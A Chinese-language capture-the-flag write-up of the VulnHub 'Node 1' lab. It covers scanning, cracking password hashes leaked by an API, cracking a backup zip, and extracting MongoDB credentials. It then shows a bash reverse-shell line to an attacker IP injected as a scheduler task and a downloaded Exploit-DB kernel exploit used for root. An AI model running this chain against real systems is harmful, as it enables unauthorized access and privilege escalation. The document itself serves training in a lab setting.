前言
⏰时间:2023.7.30
🗺️靶机地址: https://www.vulnhub.com/entry/node-1,252/
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝
信息收集
主机发现
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.58.1/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 22:43 HKT
Nmap scan report for 192.168.58.1
Host is up (0.00014s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.58.2
Host is up (0.000085s latency).
MAC Address: 00:50:56:EB:56:98 (VMware)
Nmap scan report for 192.168.58.164
Host is up (0.00018s latency).
本次目标是192.168.58.164
用masscan探测端口开放情况
┌──(root㉿Erik)-[~]
└─# masscan --rate=10000 -p 1-65535 192.168.58.164
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-07-30 02:57:59 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 3000/tcp on 192.168.58.164
Discovered open port 22/tcp on 192.168.58.164
nmap进一步探测端口banner
┌──(root㉿Erik)-[~]
└─# nmap -A -T4 -p 22,3000 192.168.58.164
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-30 10:59 HKT
Nmap scan report for 192.168.58.164
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-tasktracker Apache Hadoop
|_http-title: MyPlace
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
MAC Address: 00:0C:29:F2:87:EF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.16 - 4.6 (97%), Linux 3.2 - 4.9 (97%), Linux 4.4 (97%), Linux 3.13 (94%), Linux 4.2 (94%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Android 5.0 - 6.0.1 (Linux 3.4) (91%), Linux 2.6.32 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
先看下3000口上的服务
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2XVYY9vg-1690706816425)(https://flowus.cn/preview/48268686-e71c-4a5b-8c1d-c9a5a3a3853f)]](https://i-blog.csdnimg.cn/blog_migrate/37d3da8da9f27128c9a1c7a47a6ac940.png)
直接给了三个用户名,tom,mark,rastating
API泄露密码hash
用burp抓取网站流量发现存在api
┌──(root㉿Erik)-[~]
└─# curl -s 192.168.58.164:3000/api/users | python -m json.tool
[
{
"_id": "59a7365b98aa325cc03ee51c",
"username": "myP14ceAdm1nAcc0uNT",
"password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
"is_admin": true
},
{
"_id": "59a7368398aa325cc03ee51d",
"username": "tom",
"password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
"is_admin": false
},
{
"_id": "59a7368e98aa325cc03ee51e",
"username": "mark",
"password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
"is_admin": false
},
{
"_id": "59aa9781cced6f1d1490fce9",
"username": "rastating",
"password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
"is_admin": false
}
]
将用户名密码提取保存
┌──(root㉿Erik)-[~]
└─# curl -s 192.168.58.164:3000/api/users | python -m json.tool| grep pass|cut -d '"' -f4 |tee hash.txt
dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240
de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73
5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0
将用户名提取保存
┌──(root㉿Erik)-[~]
└─# curl -s 192.168.58.164:3000/api/users | python -m json.tool|grep user|cut -d '"' -f4|tee users.txt
myP14ceAdm1nAcc0uNT
tom
mark
rastating
hashcat破解
┌──(root㉿Erik)-[~]
└─# hashcat -a 0 -m 1400 hash.txt /usr/share/wordlists/rockyou.txt --show
dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester
f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob
de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake
┌──(root㉿Erik)-[~]
└─# hashcat -a 0 -m 1400 hash.txt /usr/share/wordlists/rockyou.txt --show|cut -d ':' -f2|tee passwd.txt
manchester
spongebob
snowflake
┌──(root㉿Erik)-[~]
└─# paste -d ':' users.txt passwd.txt |tee ssh.txt
myP14ceAdm1nAcc0uNT:manchester
tom:spongebob
mark:snowflake
rastating:
hydra去爆破ssh看看
┌──(root㉿Erik)-[~]
└─# hydra -C ssh.txt -e nsr ssh://192.168.58.164
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-30 14:42:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries, ~1 try per task
[DATA] attacking ssh://192.168.58.164:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-30 14:42:22
看来不是
登录下载backup
登录网站看看吧,使用myP14ceAdm1nAcc0uNT:manchester登录admin
提示让下载backup
分析文件
┌──(root㉿Erik)-[/tmp]
└─# file myplace.backup
myplace.backup: ASCII text, with very long lines (65536), with no line terminators
部分内容:
ydGlhbHMvcHJvZmlsZS5odG1sVVQFAAMimapZdXgLAAEEAAAAAAQAAAAAUEsBAh4DFAAJAAgAfWMiS4Tw22u4BAAAFQ8AABgAGAAAAAAAAQAAALSBtvUlAHZhci93d3cvbXlwbGFjZS9hcHAuaHRtbFVUBQADvpWqWXV4CwABBAAAAAAEAAAAAFBLBQYAAAAAXwNfA3edAQDQ+iUAAAA=
看着像是base64编码,先解码看看
┌──(root㉿Erik)-[/tmp]
└─# cat myplace.backup|base64 -d > decode.backup
┌──(root㉿Erik)-[/tmp]
└─# file decode.backup
decode.backup: Zip archive data, at least v1.0 to extract, compression method=store
后缀改为zip进行解压缩
┌──(root㉿Erik)-[/tmp]
└─# mv decode.backup myplace.zip
┌──(root㉿Erik)-[/tmp]
└─# unzip myplace.zip
Archive: myplace.zip
creating: var/www/myplace/
[myplace.zip] var/www/myplace/package-lock.json password:
破解压缩包
┌──(root㉿Erik)-[/tmp]
└─# fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt myplace.zip
'var/www/myplace/' is not encrypted, skipping
found file 'var/www/myplace/package-lock.json', (size cp/uc 4404/ 21264, flags 9, chk 0145)
'var/www/myplace/node_modules/' is not encrypted, skipping
'var/www/myplace/node_modules/serve-static/' is not encrypted, skipping
found file 'var/www/myplace/node_modules/serve-static/README.md', (size cp/uc 2733/ 7508, flags 9, chk 1223)
found file 'var/www/myplace/node_modules/serve-static/index.js', (size cp/uc 1640/ 4533, flags 9, chk b964)
found file 'var/www/myplace/node_modules/serve-static/LICENSE', (size cp/uc 697/ 1189, flags 9, chk 1020)
found file 'var/www/myplace/node_modules/serve-static/HISTORY.md', (size cp/uc 2625/ 8504, flags 9, chk 35bd)
found file 'var/www/myplace/node_modules/serve-static/package.json', (size cp/uc 868/ 2175, flags 9, chk 0145)
'var/www/myplace/node_modules/utils-merge/' is not encrypted, skipping
found file 'var/www/myplace/node_modules/utils-merge/README.md', (size cp/uc 344/ 634, flags 9, chk 9f17)
found file 'var/www/myplace/node_modules/utils-merge/index.js', (size cp/uc 219/ 381, flags 9, chk 9e03)
8 file maximum reached, skipping further files
PASSWORD FOUND!!!!: pw == magicword
解码后看到app.js文件中存在mongoDB用户名和密码
┌──(root㉿Erik)-[/tmp/var/www/myplace]
└─# cat app.js
const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const path = require("path");
const spawn = require('child_process').spawn;
const app = express();
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
ssh登录Mark
ssh登录mark
┌──(root㉿Erik)-[/tmp/var/www/myplace]
└─# ssh mark@192.168.58.164
The authenticity of host '192.168.58.164 (192.168.58.164)' can't be established.
ED25519 key fingerprint is SHA256:l5rO4mtd28sC7Bh8t7rHpUxqmHnGYUDxX1DHmLFrzrk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.58.164' (ED25519) to the list of known hosts.
mark@192.168.58.164's password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
.-.
.-'``(|||)
,`\ \ `-`. 88 88
/ \ '``-. ` 88 88
.-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88
(:::) : ___ 88 88 88 88 88 88 88 88 88 88 88
`-` ` , : 88 88 88 88 88 88 88 88 88 88 88
\ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88
`./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888'
`-..-( )
`-`
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Aug 6 23:32:28 2018 from 10.2.1.1
mark@node:~$ id
uid=1001(mark) gid=1001(mark) groups=1001(mark)
mark@node:/home/tom$ ls -la
total 40
drwxr-xr-x 6 root root 4096 Sep 3 2017 .
drwxr-xr-x 5 root root 4096 Aug 31 2017 ..
-rw-r--r-- 1 root root 220 Aug 29 2017 .bash_logout
-rw-r--r-- 1 root root 3771 Aug 29 2017 .bashrc
drwx------ 2 root root 4096 Aug 29 2017 .cache
drwxr-xr-x 3 root root 4096 Aug 30 2017 .config
-rw-r----- 1 root root 0 Sep 3 2017 .dbshell
-rwxr-xr-x 1 root root 0 Aug 30 2017 .mongorc.js
drwxrwxr-x 2 root root 4096 Aug 29 2017 .nano
drwxr-xr-x 5 root root 4096 Aug 31 2017 .npm
-rw-r--r-- 1 root root 655 Aug 29 2017 .profile
-rw-r----- 1 root tom 33 Sep 3 2017 user.txt
这边有个user.txt文件,目前无权查看,需横移到tom
MongoDB添加任务
看下tom运行的服务
mark@node:/tmp$ ps aux |grep tom
tom 1558 0.0 4.6 1009080 34956 ? Ssl 03:21 0:02 /usr/bin/node /var/scheduler/app.js
tom 1613 0.0 7.5 1051820 57212 ? Ssl 03:21 0:11 /usr/bin/node /var/www/myplace/app.js
运行/var/scheduler/app.js
mark@node:/tmp$ cat /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}
setInterval(function () {
db.collection('tasks').find().toArray(function (error, docs) {
if (!error && docs) {
docs.forEach(function (doc) {
if (doc) {
console.log('Executing task ' + doc._id + '...');
exec(doc.cmd);
db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
}
});
}
else if (error) {
console.log('Something went wrong: ' + error);
}
});
}, 30000);
});
使用mark的凭据进入mongodb
mark@node:/home/tom$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
MongoDB shell version: 3.2.16
connecting to: scheduler
> show collections
tasks
创建反弹shell,将执行命令添加到任务
printf '#!/bin/bash\n\n /bin/bash -i >& /dev/tcp/192.168.58.153/5555 0>&1\n' > rshell;chmod 4777 rshell;
mark@node:/home/tom$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
MongoDB shell version: 3.2.16
connecting to: scheduler
> db.tasks.insert({_id: 0, cmd: "/tmp/rshell"})
WriteResult({ "nInserted" : 1 })
> db.tasks.find({})
{ "_id" : 0, "cmd" : "/tmp/rshell" }
提权root
tom@node:/tmp# uname -a
Linux node 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
wget https://www.exploit-db.com/download/44298
mark@node:/tmp$ mv 44298 44298.c
mark@node:/tmp$ gcc 44298.c
mark@node:/tmp$ ls
44298.c
a.out
mark@node:/tmp$ ./a.out
task_struct = ffff880027910000
uidptr = ffff8800039eb784
spawning root shell
root@node:/tmp# ls /root
root.txt
root@node:/tmp# cat /root/r*
1722e99ca5f353b362556a62bd5e6be0
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
